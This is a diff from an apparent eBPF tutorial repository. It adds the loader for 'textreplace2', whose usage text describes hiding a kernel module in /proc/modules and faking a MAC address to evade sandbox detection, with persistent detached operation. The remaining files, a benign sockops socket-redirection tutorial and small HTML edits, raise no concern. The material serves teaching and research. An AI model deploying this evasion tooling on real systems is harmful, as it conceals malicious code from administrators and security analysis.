(setrlimit(RLIMIT_MEMLOCK, &rlim_new)) { + fprintf(stderr, "Failed to increase RLIMIT_MEMLOCK limit! (hint: run as root)\n"); + return false; + } + return true; +} + + +static bool setup() { + // Set up libbpf errors and debug info callback + libbpf_set_print(libbpf_print_fn); + + // Bump RLIMIT_MEMLOCK to allow BPF sub-system to do anything + if (!bump_memlock_rlimit()) { + return false; + }; + + // Setup signal handler so we exit cleanly + if (!setup_sig_handler()) { + return false; + } + + return true; +} + +// Setup Argument stuff +static struct env { + char filename[FILENAME_LEN_MAX]; + char input[FILENAME_LEN_MAX]; + char replace[FILENAME_LEN_MAX]; + bool detatch; + int target_ppid; +} env; + +const char *argp_program_version = "textreplace2 1.0"; +const char *argp_program_bug_address = ""; +const char argp_program_doc[] = +"Text Replace\n" +"\n" +"Replaces text in a file.\n" +"To pass in newlines use \%'\\n' e.g.:\n" +" ./textreplace2 -f /proc/modules -i ppdev -r $'aaaa\\n'" +"\n" +"USAGE: ./textreplace2 -f filename -i input -r output [-t 1111] [-d]\n" +"EXAMPLES:\n" +"Hide kernel module:\n" +" ./textreplace2 -f /proc/modules -i 'joydev' -r 'cryptd'\n" +"Fake Ethernet adapter (used in sandbox detection): \n" +" ./textreplace2 -f /sys/class/net/eth0/address -i '00:15:5d:01:ca:05' -r '00:00:00:00:00:00' \n" +"Run detached (userspace program can exit):\n" +" ./textreplace2 -f /proc/modules -i 'joydev' -r 'cryptd' --detach\n" +"To stop detached program:\n" +" sudo rm -rf /sys/fs/bpf/textreplace\n" +""; + +static const struct argp_option opts[] = { + { "filename", 'f', "FILENAME", 0, "Path to file to replace text in" }, + { "input", 'i', "INPUT", 0, "Text to be replaced in file, max 20 chars" }, + { "replace", 'r', "REPLACE", 0, "Text to replace with in file, must be same size as -t" }, + { "target-ppid", 't', "PPID", 0, "Optional Parent PID, will only affect its children." 
}, + { "detatch", 'd', NULL, 0, "Pin programs to filesystem and exit usermode process" }, + {}, +}; + +static error_t parse_arg(int key, char *arg, struct argp_state *state) +{ + switch (key) { + case 'i': + if (strlen(arg) >= TEXT_LEN_MAX) { + fprintf(stderr, "Text must be less than %d characters\n", FILENAME_LEN_MAX); + argp_usage(state); + } + strncpy(env.input, arg, sizeof(env.input)); + break; + case 'd': + env.detatch = true; + break; + case 'r': + if (strlen(arg) >= TEXT_LEN_MAX) { + fprintf(stderr, "Text must be less than %d characters\n", FILENAME_LEN_MAX); + argp_usage(state); + } + strncpy(env.replace, arg, sizeof(env.replace)); + break; + case 'f': + if (strlen(arg) >= FILENAME_LEN_MAX) { + fprintf(stderr, "Filename must be less than %d characters\n", FILENAME_LEN_MAX); + argp_usage(state); + } + strncpy(env.filename, arg, sizeof(env.filename)); + break; + case 't': + errno = 0; + env.target_ppid = strtol(arg, NULL, 10); + if (errno || env.target_ppid <= 0) { + fprintf(stderr, "Invalid pid: %s\n", arg); + argp_usage(state); + } + break; + case ARGP_KEY_ARG: + argp_usage(state); + break; + default: + return ARGP_ERR_UNKNOWN; + } + return 0; +} +static const struct argp argp = { + .options = opts, + .parser = parse_arg, + .doc = argp_program_doc, +}; + +static int handle_event(void *ctx, void *data, size_t data_sz) +{ + const struct event *e = data; + if (e->success) + printf("Replaced text in PID %d (%s)\n", e->pid, e->comm); + else + printf("Failed to replace text in PID %d (%s)\n", e->pid, e->comm); + return 0; +} + +static const char* base_folder = "/sys/fs/bpf/textreplace"; + +int rmtree(const char *path) +{ + size_t path_len; + char *full_path; + DIR *dir; + struct stat stat_path, stat_entry; + struct dirent *entry; + + // stat for the path + stat(path, &stat_path); + + // if path does not exists or is not dir - exit with status -1 + if (S_ISDIR(stat_path.st_mode) == 0) { + // ignore + return 0; + } + + // if not possible to read the directory for this user + if ((dir = opendir(path)) == NULL) { + fprintf(stderr, "%s: %s\n", "Can`t open directory", path); + return 1; + } + + // the length of the path + path_len = strlen(path); + + // iteration through entries in the directory + while ((entry = readdir(dir)) != NULL) { + // skip entries "." and ".." 
+ if (!strcmp(entry->d_name, ".") || !strcmp(entry->d_name, "..")) + continue; + + // determinate a full path of an entry + full_path = calloc(path_len + strlen(entry->d_name) + 1, sizeof(char)); + strcpy(full_path, path); + strcat(full_path, "/"); + strcat(full_path, entry->d_name); + + // stat for the entry + stat(full_path, &stat_entry); + + // recursively remove a nested directory + if (S_ISDIR(stat_entry.st_mode) != 0) { + rmtree(full_path); + continue; + } + + // remove a file object + if (unlink(full_path)) { + printf("Can`t remove a file: %s\n", full_path); + return 1; + } + free(full_path); + } + + // remove the devastated directory and close the object of it + if (rmdir(path)) { + printf("Can`t remove a directory: %s\n", path); + return 1; + } + + closedir(dir); + return 0; +} + + +int cleanup_pins() { + return rmtree(base_folder); +} + +int pin_program(struct bpf_program *prog, const char* path) +{ + int err; + err = bpf_program__pin(prog, path); + if (err) { + fprintf(stdout, "could not pin prog %s: %d\n", path, err); + return err; + } + return err; +} + +int pin_map(struct bpf_map *map, const char* path) +{ + int err; + err = bpf_map__pin(map, path); + if (err) { + fprintf(stdout, "could not pin map %s: %d\n", path, err); + return err; + } + return err; +} + +int pin_link(struct bpf_link *link, const char* path) +{ + int err; + err = bpf_link__pin(link, path); + if (err) { + fprintf(stdout, "could not pin link %s: %d\n", path, err); + return err; + } + return err; +} + +static int pin_stuff(struct textreplace2_bpf *skel) { + /* + Sorry in advance for not this function being quite garbage, + but I tried to keep the code simple to make it easy to read + and modify + */ + int err; + int counter = 0; + struct bpf_program *prog; + struct bpf_map *map; + char pin_path[100]; + + // Pin Maps + bpf_object__for_each_map(map, skel->obj) { + sprintf(pin_path, "%s/map_%02d", base_folder, counter++); + err = pin_map(map, pin_path); + if (err) { return err; } + } + + // Pin Programs + counter = 0; + bpf_object__for_each_program(prog, skel->obj) { + sprintf(pin_path, "%s/prog_%02d", base_folder, counter++); + err = pin_program(prog, pin_path); + if (err) { return err; } + } + + // Pin Links. 
There's not for_each for links + // so do it manually in a gross way + counter = 0; + memset(pin_path, '\x00', sizeof(pin_path)); + sprintf(pin_path, "%s/link_%02d", base_folder, counter++); + err = pin_link(skel->links.handle_close_exit, pin_path); + if (err) { return err; } + sprintf(pin_path, "%s/link_%02d", base_folder, counter++); + err = pin_link(skel->links.handle_openat_enter, pin_path); + if (err) { return err; } + sprintf(pin_path, "%s/link_%02d", base_folder, counter++); + err = pin_link(skel->links.handle_openat_exit, pin_path); + if (err) { return err; } + sprintf(pin_path, "%s/link_%02d", base_folder, counter++); + err = pin_link(skel->links.handle_read_enter, pin_path); + if (err) { return err; } + sprintf(pin_path, "%s/link_%02d", base_folder, counter++); + err = pin_link(skel->links.find_possible_addrs, pin_path); + if (err) { return err; } + sprintf(pin_path, "%s/link_%02d", base_folder, counter++); + err = pin_link(skel->links.check_possible_addresses, pin_path); + if (err) { return err; } + sprintf(pin_path, "%s/link_%02d", base_folder, counter++); + err = pin_link(skel->links.overwrite_addresses, pin_path); + if (err) { return err; } + + return 0; +} + +int main(int argc, char **argv) +{ + struct ring_buffer *rb = NULL; + struct textreplace2_bpf *skel; + int err; + int index; + // Parse command line arguments + err = argp_parse(&argp, argc, argv, 0, NULL, NULL); + if (err) { + return err; + } + if (env.filename[0] == '\x00' || env.input[0] == '\x00' || env.replace[0] == '\x00') { + printf("ERROR: filename, input, and replace all requried, see %s --help\n", argv[0]); + exit(1); + } + if (strlen(env.input) != strlen(env.replace)) { + printf("ERROR: input and replace text must be the same length\n"); + exit(1); + } + + // Do common setup + if (!setup()) { + exit(1); + } + + if (env.detatch) { + // Check bpf filesystem is mounted + if (access("/sys/fs/bpf", F_OK) != 0) { + fprintf(stderr, "Make sure bpf filesystem mounted by running:\n"); + fprintf(stderr, " sudo mount bpffs -t bpf /sys/fs/bpf\n"); + return 1; + } + if (cleanup_pins()) + return 1; + } + + // Open BPF application + skel = textreplace2_bpf__open(); + if (!skel) { + fprintf(stderr, "Failed to open BPF program: %s\n", strerror(errno)); + return 1; + } + + // Verify and load program + err = textreplace2_bpf__load(skel); + if (err) { + fprintf(stderr, "Failed to load and verify BPF skeleton\n"); + goto cleanup; + } + + struct tr_file file; + strncpy(file.filename, env.filename, sizeof(file.filename)); + index = PROG_00; + file.filename_len = strlen(env.filename); + err = bpf_map_update_elem( + bpf_map__fd(skel->maps.map_filename), + &index, + &file, + BPF_ANY + ); + if (err == -1) { + printf("Failed to add filename to map? %s\n", strerror(errno)); + goto cleanup; + } + + struct tr_text text; + strncpy(text.text, env.input, sizeof(text.text)); + index = PROG_00; + text.text_len = strlen(env.input); + err = bpf_map_update_elem( + bpf_map__fd(skel->maps.map_text), + &index, + &text, + BPF_ANY + ); + if (err == -1) { + printf("Failed to add text input to map? %s\n", strerror(errno)); + goto cleanup; + } + strncpy(text.text, env.replace, sizeof(text.text)); + index = PROG_01; + text.text_len = strlen(env.replace); + err = bpf_map_update_elem( + bpf_map__fd(skel->maps.map_text), + &index, + &text, + BPF_ANY + ); + if (err == -1) { + printf("Failed to add text replace to map? 
%s\n", strerror(errno)); + goto cleanup; + } + + // Add program to map so we can call it later + index = PROG_01; + int prog_fd = bpf_program__fd(skel->progs.check_possible_addresses); + err = bpf_map_update_elem( + bpf_map__fd(skel->maps.map_prog_array), + &index, + &prog_fd, + BPF_ANY); + if (err == -1) { + printf("Failed to add program to prog array! %s\n", strerror(errno)); + goto cleanup; + } + index = PROG_02; + prog_fd = bpf_program__fd(skel->progs.overwrite_addresses); + err = bpf_map_update_elem( + bpf_map__fd(skel->maps.map_prog_array), + &index, + &prog_fd, + BPF_ANY); + if (err == -1) { + printf("Failed to add program to prog array! %s\n", strerror(errno)); + goto cleanup; + } + + // Attach tracepoint handler + err = textreplace2_bpf__attach(skel); + if (err) { + fprintf(stderr, "Failed to attach BPF program: %s\n", strerror(errno)); + goto cleanup; + } + + if (env.detatch) { + err = pin_stuff(skel); + if (err) { + fprintf(stderr, "Failed to pin stuff\n"); + goto cleanup; + } + + printf("----------------------------------\n"); + printf("----------------------------------\n"); + printf("Successfully started!\n"); + printf("Please run `sudo cat /sys/kernel/debug/tracing/trace_pipe` " + "to see output of the BPF programs.\n"); + printf("Files are pinned in folder %s\n", base_folder); + printf("To stop programs, run 'sudo rm -r%s'\n", base_folder); + } + else { + // Set up ring buffer + rb = ring_buffer__new(bpf_map__fd( skel->maps.rb), handle_event, NULL, NULL); + if (!rb) { + err = -1; + fprintf(stderr, "Failed to create ring buffer\n"); + goto cleanup; + } + + printf("Successfully started!\n"); + while (!exiting) { + err = ring_buffer__poll(rb, 100 /* timeout, ms */); + /* Ctrl-C will cause -EINTR */ + if (err == -EINTR) { + err = 0; + break; + } + if (err < 0) { + printf("Error polling perf buffer: %d\n", err); + break; + } + } + } + +cleanup: + textreplace2_bpf__destroy(skel); + if (err != 0) { + cleanup_pins(); + } + return -err; +} diff --git a/28-detach/textreplace2.h b/28-detach/textreplace2.h new file mode 100644 index 0000000..4686d92 --- /dev/null +++ b/28-detach/textreplace2.h @@ -0,0 +1,35 @@ +// SPDX-License-Identifier: BSD-3-Clause +#ifndef BAD_BPF_COMMON_H +#define BAD_BPF_COMMON_H + +// These are used by a number of +// different programs to sync eBPF Tail Call +// login between user space and kernel +#define PROG_00 0 +#define PROG_01 1 +#define PROG_02 2 + +// Used when replacing text +#define FILENAME_LEN_MAX 50 +#define TEXT_LEN_MAX 20 + +// Simple message structure to get events from eBPF Programs +// in the kernel to user spcae +#define TASK_COMM_LEN 16 +struct event { + int pid; + char comm[TASK_COMM_LEN]; + bool success; +}; + +struct tr_file { + char filename[FILENAME_LEN_MAX]; + unsigned int filename_len; +}; + +struct tr_text { + char text[TEXT_LEN_MAX]; + unsigned int text_len; +}; + +#endif // BAD_BPF_COMMON_H diff --git a/29-sockops/.gitignore b/29-sockops/.gitignore new file mode 100644 index 0000000..024ee36 --- /dev/null +++ b/29-sockops/.gitignore @@ -0,0 +1,8 @@ +.vscode +package.json +*.o +*.skel.json +*.skel.yaml +package.yaml +ecli +ecc diff --git a/29-sockops/bpf_redir.c b/29-sockops/bpf_redir.c new file mode 100644 index 0000000..654587b --- /dev/null +++ b/29-sockops/bpf_redir.c @@ -0,0 +1,27 @@ +#include +#include + +#include "bpf_sockops.h" + +__section("sk_msg") +int bpf_redir(struct sk_msg_md *msg) +{ + __u64 flags = BPF_F_INGRESS; + struct sock_key key = {}; + + sk_msg_extract4_key(msg, &key); + // See whether the source or 
destination IP is local host + if (key.sip4 == 16777343 || key.dip4 == 16777343) { + // See whether the source or destination port is 10000 + if (key.sport == 4135 || key.dport == 4135) { + int len1 = (__u64)msg->data_end - (__u64)msg->data; + printk("<<< redir_proxy port %d --> %d (%d)\n", key.sport, key.dport, len1); + msg_redirect_hash(msg, &sock_ops_map, &key, flags); + } + } + + return SK_PASS; +} + +BPF_LICENSE("GPL"); +int _version __section("version") = 1; diff --git a/29-sockops/bpf_sockops.c b/29-sockops/bpf_sockops.c new file mode 100644 index 0000000..b19929b --- /dev/null +++ b/29-sockops/bpf_sockops.c @@ -0,0 +1,52 @@ +#include +#include +#include + +#include "bpf_sockops.h" + +static inline void bpf_sock_ops_ipv4(struct bpf_sock_ops *skops) +{ + struct sock_key key = {}; + sk_extract4_key(skops, &key); + if (key.dip4 == 16777343 || key.sip4 == 16777343 ) { + if (key.dport == 4135 || key.sport == 4135) { + int ret = sock_hash_update(skops, &sock_ops_map, &key, BPF_NOEXIST); + printk("<<< ipv4 op = %d, port %d --> %d\n", skops->op, key.sport, key.dport); + if (ret != 0) + printk("*** FAILED %d ***\n", ret); + } + } +} + +static inline void bpf_sock_ops_ipv6(struct bpf_sock_ops *skops) +{ + if (skops->remote_ip4) + bpf_sock_ops_ipv4(skops); +} + + +__section("sockops") +int bpf_sockmap(struct bpf_sock_ops *skops) +{ + __u32 family, op; + + family = skops->family; + op = skops->op; + + printk("<<< op %d, port = %d --> %d\n", op, skops->local_port, skops->remote_port); + switch (op) { + case BPF_SOCK_OPS_PASSIVE_ESTABLISHED_CB: + case BPF_SOCK_OPS_ACTIVE_ESTABLISHED_CB: + if (family == AF_INET6) + bpf_sock_ops_ipv6(skops); + else if (family == AF_INET) + bpf_sock_ops_ipv4(skops); + break; + default: + break; + } + return 0; +} + +BPF_LICENSE("GPL"); +int _version __section("version") = 1; diff --git a/29-sockops/bpf_sockops.h b/29-sockops/bpf_sockops.h new file mode 100644 index 0000000..c625da2 --- /dev/null +++ b/29-sockops/bpf_sockops.h @@ -0,0 +1,168 @@ +#include +#include + +#if __BYTE_ORDER__ == __ORDER_LITTLE_ENDIAN__ +# define __bpf_ntohs(x) __builtin_bswap16(x) +# define __bpf_htons(x) __builtin_bswap16(x) +# define __bpf_constant_ntohs(x) ___constant_swab16(x) +# define __bpf_constant_htons(x) ___constant_swab16(x) +# define __bpf_ntohl(x) __builtin_bswap32(x) +# define __bpf_htonl(x) __builtin_bswap32(x) +# define __bpf_constant_ntohl(x) ___constant_swab32(x) +# define __bpf_constant_htonl(x) ___constant_swab32(x) +#elif __BYTE_ORDER__ == __ORDER_BIG_ENDIAN__ +# define __bpf_ntohs(x) (x) +# define __bpf_htons(x) (x) +# define __bpf_constant_ntohs(x) (x) +# define __bpf_constant_htons(x) (x) +# define __bpf_ntohl(x) (x) +# define __bpf_htonl(x) (x) +# define __bpf_constant_ntohl(x) (x) +# define __bpf_constant_htonl(x) (x) +#else +# error "Fix your compiler's __BYTE_ORDER__?!" +#endif + +#define bpf_htons(x) \ + (__builtin_constant_p(x) ? \ + __bpf_constant_htons(x) : __bpf_htons(x)) +#define bpf_ntohs(x) \ + (__builtin_constant_p(x) ? \ + __bpf_constant_ntohs(x) : __bpf_ntohs(x)) +#define bpf_htonl(x) \ + (__builtin_constant_p(x) ? \ + __bpf_constant_htonl(x) : __bpf_htonl(x)) +#define bpf_ntohl(x) \ + (__builtin_constant_p(x) ? \ + __bpf_constant_ntohl(x) : __bpf_ntohl(x)) + +/** Section helper macros. 
*/ + +#ifndef __section +# define __section(NAME) \ + __attribute__((section(NAME), used)) +#endif + +#ifndef __section_tail +# define __section_tail(ID, KEY) \ + __section(__stringify(ID) "/" __stringify(KEY)) +#endif + +#ifndef __section_cls_entry +# define __section_cls_entry \ + __section("classifier") +#endif + +#ifndef __section_act_entry +# define __section_act_entry \ + __section("action") +#endif + +#ifndef __section_license +# define __section_license \ + __section("license") +#endif + +#ifndef __section_maps +# define __section_maps \ + __section("maps") +#endif + +/** Declaration helper macros. */ + +#ifndef BPF_LICENSE +# define BPF_LICENSE(NAME) \ + char ____license[] __section_license = NAME +#endif + +#ifndef BPF_FUNC +# define BPF_FUNC(NAME, ...) \ + (*NAME)(__VA_ARGS__) = (void *)BPF_FUNC_##NAME +#endif + +static int BPF_FUNC(sock_hash_update, struct bpf_sock_ops *skops, void *map, void *key, uint64_t flags); +static int BPF_FUNC(msg_redirect_hash, struct sk_msg_md *md, void *map, void *key, uint64_t flags); +static void BPF_FUNC(trace_printk, const char *fmt, int fmt_size, ...); + +#ifndef printk +# define printk(fmt, ...) \ + ({ \ + char ____fmt[] = fmt; \ + trace_printk(____fmt, sizeof(____fmt), ##__VA_ARGS__); \ + }) +#endif + + +struct bpf_map_def { + __u32 type; + __u32 key_size; + __u32 value_size; + __u32 max_entries; + __u32 map_flags; +}; + +union v6addr { + struct { + __u32 p1; + __u32 p2; + __u32 p3; + __u32 p4; + }; + __u8 addr[16]; +}; + +struct sock_key { + union { + struct { + __u32 sip4; + __u32 pad1; + __u32 pad2; + __u32 pad3; + }; + union v6addr sip6; + }; + union { + struct { + __u32 dip4; + __u32 pad4; + __u32 pad5; + __u32 pad6; + }; + union v6addr dip6; + }; + __u8 family; + __u8 pad7; + __u16 pad8; + __u32 sport; + __u32 dport; +} __attribute__((packed)); + +struct bpf_map_def __section_maps sock_ops_map = { + .type = BPF_MAP_TYPE_SOCKHASH, + .key_size = sizeof(struct sock_key), + .value_size = sizeof(int), + .max_entries = 65535, + .map_flags = 0, +}; + +static inline void sk_extract4_key(struct bpf_sock_ops *ops, + struct sock_key *key) +{ + key->dip4 = ops->remote_ip4; + key->sip4 = ops->local_ip4; + key->family = 1; + + key->sport = (bpf_htonl(ops->local_port) >> 16); + key->dport = ops->remote_port >> 16; +} + +static inline void sk_msg_extract4_key(struct sk_msg_md *msg, + struct sock_key *key) +{ + key->sip4 = msg->remote_ip4; + key->dip4 = msg->local_ip4; + key->family = 1; + + key->dport = (bpf_htonl(msg->local_port) >> 16); + key->sport = msg->remote_port >> 16; +} diff --git a/29-sockops/envoy/Dockerfile b/29-sockops/envoy/Dockerfile new file mode 100644 index 0000000..1f1da7f --- /dev/null +++ b/29-sockops/envoy/Dockerfile @@ -0,0 +1,3 @@ +FROM envoyproxy/envoy:latest +COPY envoy.yaml /etc/envoy/envoy.yaml +EXPOSE 9901 diff --git a/29-sockops/envoy/envoy.yaml b/29-sockops/envoy/envoy.yaml new file mode 100644 index 0000000..6225a4f --- /dev/null +++ b/29-sockops/envoy/envoy.yaml @@ -0,0 +1,30 @@ +admin: + access_log_path: /tmp/admin_access.log + address: + socket_address: + protocol: TCP + address: 0.0.0.0 + port_value: 9901 +static_resources: + listeners: + - name: iperf3-listener + address: + socket_address: + protocol: TCP + address: 0.0.0.0 + port_value: 10000 + filter_chains: + - filters: + - name: envoy.tcp_proxy + config: + stat_prefix: iperf3-listener + cluster: iperf3_server + clusters: + - name: iperf3_server + connect_timeout: 1.0s + type: static + lb_policy: ROUND_ROBIN + hosts: + - socket_address: + address: 127.0.0.1 + 
port_value: 5201 diff --git a/29-sockops/index.html b/29-sockops/index.html new file mode 100644 index 0000000..9300922 --- /dev/null +++ b/29-sockops/index.html @@ -0,0 +1,245 @@ + + + + + + 使用 sockops 加速网络请求转发 - bpf-developer-tutorial + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    + + + + + + + + + + + + + + +
    + +
    + + + + + + + + +
    +
    +

    eBPF sockops 示例

    +

    利用 eBPF 的 sockops 进行性能优化

    +

    网络连接本质上是 socket 之间的通讯,eBPF 提供了一个 bpf_msg_redirect_hash 函数,用来将应用发出的包直接转发到对端的 socket,可以极大地加速包在内核中的处理流程。

    +

这里的 sock_map 是记录 socket 转发规则的关键部分:根据当前数据包的信息,从 sock_map 中找到一个已存在的 socket 连接来转发请求。因此需要先在 sockops 的 hook 处(或者其它地方)把 socket 信息保存到 sock_map 中,并约定一个规则(一般为四元组),以便之后根据 key 查找到对应的 socket。
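下面是基于这一思路的简化示意代码(采用 libbpf 风格的辅助函数;sock_key、sock_ops_map 以及 sk_extract4_key、sk_msg_extract4_key 的定义见本目录的 bpf_sockops.h,这里省略了对 127.0.0.1 和端口 10000 的过滤逻辑,完整实现请以 bpf_sockops.c 与 bpf_redir.c 为准):

SEC("sockops")
int bpf_sockmap(struct bpf_sock_ops *skops)
{
    /* 连接建立(主动或被动)时,按四元组 key 把 socket 存入 SOCKHASH */
    if (skops->op == BPF_SOCK_OPS_ACTIVE_ESTABLISHED_CB ||
        skops->op == BPF_SOCK_OPS_PASSIVE_ESTABLISHED_CB) {
        struct sock_key key = {};
        sk_extract4_key(skops, &key);
        bpf_sock_hash_update(skops, &sock_ops_map, &key, BPF_NOEXIST);
    }
    return 0;
}

SEC("sk_msg")
int bpf_redir(struct sk_msg_md *msg)
{
    /* 发送数据时,用反向四元组查找对端 socket,命中则绕过内核协议栈直接转发 */
    struct sock_key key = {};
    sk_msg_extract4_key(msg, &key);
    bpf_msg_redirect_hash(msg, &sock_ops_map, &key, BPF_F_INGRESS);
    return SK_PASS;
}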

    +

Merbridge 项目正是基于这种方式,使用 eBPF 代替 iptables 为 Istio 实现加速。在使用 Merbridge (eBPF) 优化之后,出入口流量会直接跳过很多内核模块,明显提高性能,如下图所示:

    +

    merbridge

    +

    运行样例

    +

    此示例程序从发送者的套接字(出口)重定向流量至接收者的套接字(入口),跳过 TCP/IP 内核网络栈。在这个示例中,我们假定发送者和接收者都在同一台机器上运行。

    +

    编译 eBPF 程序

    +
    # Compile the bpf_sockops program
    +clang -O2 -g  -Wall -target bpf  -c bpf_sockops.c -o bpf_sockops.o
    +clang -O2 -g  -Wall -target bpf  -c bpf_redir.c -o bpf_redir.o
    +
    +

    加载 eBPF 程序

    +
    sudo ./load.sh
    +
    +

您可以使用 bpftool 工具检查这两个 eBPF 程序是否已经加载:

    +
    $ sudo bpftool prog show
    +63: sock_ops  name bpf_sockmap  tag 275467be1d69253d  gpl
    + loaded_at 2019-01-24T13:07:17+0200  uid 0
    + xlated 1232B  jited 750B  memlock 4096B  map_ids 58
    +64: sk_msg  name bpf_redir  tag bc78074aa9dd96f4  gpl
    + loaded_at 2019-01-24T13:07:17+0200  uid 0
    + xlated 304B  jited 233B  memlock 4096B  map_ids 58
    +
    +

    运行 iperf3 服务器

    +
    iperf3 -s -p 10000
    +
    +

    运行 iperf3 客户端

    +
    iperf3 -c 127.0.0.1 -t 10 -l 64k -p 10000
    +
    +

    收集追踪

    +
    $ ./trace.sh
    +iperf3-9516  [001] .... 22500.634108: 0: <<< ipv4 op = 4, port 18583 --> 4135
    +iperf3-9516  [001] ..s1 22500.634137: 0: <<< ipv4 op = 5, port 4135 --> 18583
    +iperf3-9516  [001] .... 22500.634523: 0: <<< ipv4 op = 4, port 19095 --> 4135
    +iperf3-9516  [001] ..s1 22500.634536: 0: <<< ipv4 op = 5, port 4135 --> 19095
    +
    +

    你应该可以看到 4 个用于套接字建立的事件。如果你没有看到任何事件,那么 eBPF 程序可能没有正确地附加上。

    +

    卸载 eBPF 程序

    +
    sudo ./unload.sh
    +
    +

    参考资料

    + + +
    + + +
    +
    + + + +
    + + + + + + + + + + + + + + + + + + +
    + + diff --git a/29-sockops/load.sh b/29-sockops/load.sh new file mode 100755 index 0000000..df2073b --- /dev/null +++ b/29-sockops/load.sh @@ -0,0 +1,20 @@ +#!/bin/bash +set -x +set -e + +# Mount bpf filesystem +sudo mount -t bpf bpf /sys/fs/bpf/ + +# Load the bpf_sockops program +sudo bpftool prog load bpf_sockops.o "/sys/fs/bpf/bpf_sockop" +sudo bpftool cgroup attach "/sys/fs/cgroup/unified/" sock_ops pinned "/sys/fs/bpf/bpf_sockop" + +MAP_ID=$(sudo bpftool prog show pinned "/sys/fs/bpf/bpf_sockop" | grep -o -E 'map_ids [0-9]+' | awk '{print $2}') +sudo bpftool map pin id $MAP_ID "/sys/fs/bpf/sock_ops_map" + +# Load the bpf_redir program +if [ -z $1 ] +then + sudo bpftool prog load bpf_redir.o "/sys/fs/bpf/bpf_redir" map name sock_ops_map pinned "/sys/fs/bpf/sock_ops_map" + sudo bpftool prog attach pinned "/sys/fs/bpf/bpf_redir" msg_verdict pinned "/sys/fs/bpf/sock_ops_map" +fi diff --git a/29-sockops/merbridge.png b/29-sockops/merbridge.png new file mode 100644 index 0000000..f122315 Binary files /dev/null and b/29-sockops/merbridge.png differ diff --git a/29-sockops/trace.sh b/29-sockops/trace.sh new file mode 100755 index 0000000..4589b36 --- /dev/null +++ b/29-sockops/trace.sh @@ -0,0 +1,2 @@ +#!/bin/bash +sudo cat /sys/kernel/debug/tracing/trace_pipe diff --git a/29-sockops/unload.sh b/29-sockops/unload.sh new file mode 100755 index 0000000..32d8659 --- /dev/null +++ b/29-sockops/unload.sh @@ -0,0 +1,13 @@ +#!/bin/bash +set -x + +# UnLoad the bpf_redir program +sudo bpftool prog detach pinned "/sys/fs/bpf/bpf_redir" msg_verdict pinned "/sys/fs/bpf/sock_ops_map" +sudo rm "/sys/fs/bpf/bpf_redir" + +# UnLoad the bpf_sockops program +sudo bpftool cgroup detach "/sys/fs/cgroup/unified/" sock_ops pinned "/sys/fs/bpf/bpf_sockop" +sudo rm "/sys/fs/bpf/bpf_sockop" + +# Delete the map +sudo rm "/sys/fs/bpf/sock_ops_map" diff --git a/3-fentry-unlink/index.html b/3-fentry-unlink/index.html index 48ddae7..f0ed52d 100644 --- a/3-fentry-unlink/index.html +++ b/3-fentry-unlink/index.html @@ -83,7 +83,7 @@ @@ -209,7 +209,7 @@ rm test_file2

    总结

这个 eBPF 程序通过 fentry 和 fexit 分别挂载到内核函数 do_unlinkat 的入口和返回处(对应 do_unlinkat 和 do_unlinkat_exit 两个处理程序),并使用 bpf_get_current_pid_tgid 和 bpf_printk 获取调用 do_unlinkat 的进程 ID、文件名和返回值,将它们打印到内核日志中。
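其核心逻辑大致如下(依据上文总结整理的示意代码,具体细节以教程正文中的源码为准):

#include "vmlinux.h"
#include <bpf/bpf_helpers.h>
#include <bpf/bpf_tracing.h>

char LICENSE[] SEC("license") = "Dual BSD/GPL";

SEC("fentry/do_unlinkat")
int BPF_PROG(do_unlinkat, int dfd, struct filename *name)
{
    pid_t pid = bpf_get_current_pid_tgid() >> 32;
    /* 函数入口:打印进程 ID 和将被删除的文件名 */
    bpf_printk("fentry: pid = %d, filename = %s\n", pid, name->name);
    return 0;
}

SEC("fexit/do_unlinkat")
int BPF_PROG(do_unlinkat_exit, int dfd, struct filename *name, long ret)
{
    pid_t pid = bpf_get_current_pid_tgid() >> 32;
    /* 函数返回:额外打印 do_unlinkat 的返回值 */
    bpf_printk("fexit: pid = %d, filename = %s, ret = %ld\n", pid, name->name, ret);
    return 0;
}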

这个程序可以使用 ecc 工具编译、使用 ecli 命令运行,并通过 /sys/kernel/debug/tracing/trace_pipe 文件查看 eBPF 程序的输出。更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档:https://github.com/eunomia-bpf/eunomia-bpf

    -

    完整的教程和源代码已经全部开源,可以在 https://github.com/eunomia-bpf/bpf-developer-tutorial 中查看。

    +

    如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 https://github.com/eunomia-bpf/bpf-developer-tutorial 以获取更多示例和完整的教程。

diff --git a/4-opensnoop/index.html b/4-opensnoop/index.html index 4b4f70e..5784cca 100644 --- a/4-opensnoop/index.html +++ b/4-opensnoop/index.html @@ -83,7 +83,7 @@ @@ -231,7 +231,7 @@ Runing eBPF program...

本文介绍了如何使用 eBPF 程序捕获进程打开文件的系统调用。在 eBPF 程序中,我们定义了 tracepoint__syscalls__sys_enter_open 和 tracepoint__syscalls__sys_enter_openat 两个函数,并使用 SEC 宏把它们分别附加到 sys_enter_open 和 sys_enter_openat 这两个 tracepoint 上,从而在进程打开文件时触发执行。我们使用 bpf_get_current_pid_tgid 函数获取调用 open 或 openat 系统调用的进程 ID,并使用 bpf_printk 函数在内核日志中打印出来。此外,还可以通过定义一个全局变量 pid_target 来指定要捕获的进程 pid,从而过滤输出,只显示指定进程的信息。
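下面给出一个与上述描述对应的简化示意(只展示 openat 一侧,open 的处理函数与之类似;pid_target 的具体声明方式以教程正文为准):

#include "vmlinux.h"
#include <bpf/bpf_helpers.h>

/* 要过滤的进程 pid,由用户态在加载前设置;为 0 表示不过滤 */
pid_t pid_target = 0;

SEC("tracepoint/syscalls/sys_enter_openat")
int tracepoint__syscalls__sys_enter_openat(struct trace_event_raw_sys_enter *ctx)
{
    u32 pid = bpf_get_current_pid_tgid() >> 32;

    if (pid_target && pid_target != pid)
        return 0;
    /* 命中目标进程,打印到 /sys/kernel/debug/tracing/trace_pipe */
    bpf_printk("Process ID: %d enter sys openat\n", pid);
    return 0;
}

char LICENSE[] SEC("license") = "GPL";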

通过学习本教程,您应该对如何在 eBPF 中捕获和过滤特定进程的系统调用有了更深入的了解。这种方法在系统监控、性能分析和安全审计等场景中具有广泛的应用。

更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档:https://github.com/eunomia-bpf/eunomia-bpf

-

完整的教程和源代码已经全部开源,可以在 https://github.com/eunomia-bpf/bpf-developer-tutorial 中查看。

+

